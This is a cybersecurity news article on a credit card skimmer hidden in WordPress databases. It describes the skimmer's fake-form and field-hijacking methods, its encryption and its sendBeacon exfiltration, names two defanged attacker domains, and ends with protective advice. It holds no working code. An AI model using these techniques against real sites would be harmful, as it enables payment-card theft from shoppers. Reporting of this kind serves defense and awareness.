Skip to content

Sophisticated credit card skimmer malware targets WordPress websites

  • by
  • 3 min read

A newly discovered credit card skimmer malware exploits vulnerabilities in WordPress websites to steal sensitive payment information during checkout. By embedding malicious code into the database, the malware silently exfiltrates credit card details and other sensitive data, posing a significant threat to online transactions.

The malicious activity was detected within the WordPress database of a compromised website, specifically in the ‘wp_options’ table. The malware was embedded in the following row:

  • option_name: widget_block
  • option_value: Obfuscated JavaScript code

By hiding within the database rather than in theme files or plugins, the malware evades detection by conventional file-scanning tools. This strategic placement allows it to persist undetected on the infected site.

This credit card skimmer operates with alarming precision. It activates on checkout pages by identifying URLs containing ‘checkout’ while excluding those with ‘cart.’ The script deploys one of two methods to harvest payment data:

  • Fake payment form injection: The malware dynamically creates a fake payment form that mimics legitimate processors such as Stripe. It includes fields for the credit card number, expiration date, CVV, and billing information.
  • Hijacking existing payment fields: In cases where a legitimate payment form already exists, the script captures the data users enter in real-time. This ensures compatibility with a variety of payment systems.

Once the visitor enters their details, the malware encodes and encrypts the information using Base64 and AES-CBC encryption techniques, making the stolen data appear harmless during transmission. It then exfiltrates the data to attacker-controlled domains using the ‘navigator.sendBeacon’ function, ensuring a seamless user experience while the theft occurs.

As per researchers, the stolen data is sent to the following domains:

  • valhafather[.]xyz
  • fqbe23[.]xyz

Both domains are currently blocklisted on platforms like VirusTotal, and only two websites have been identified as infected so far.

Researchers say this malware poses a significant threat by stealing sensitive payment information, including credit card numbers and CVV codes, directly from checkout pages. The attackers can then use this data for fraudulent transactions or sell it on underground markets.

“It [malware] dynamically creates a fake payment form that mimics legitimate payment processors (e.g., Stripe). The form includes fields for credit card number, expiration date, CVV, and billing information. If a legitimate payment form is already on the page, the script captures data entered into these fields in real time,” researchers explained.

What makes this attack particularly insidious is its ability to operate in the background without disrupting the normal checkout process, leaving users completely unaware.

To protect against such threats, WordPress site owners are advised to regularly update all plugins, themes and WordPress core files, apply the latest security patches, use strong passwords, implement two-factor authentication, deploy tools to monitor unauthorised changes to website files and use a Web Application Firewall (WAF) to block malicious traffic and hacking attempts.

In the News: Massive data breach alleged at ESnkrs expose Nike’s CRM database

Kumar Hemant

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me

>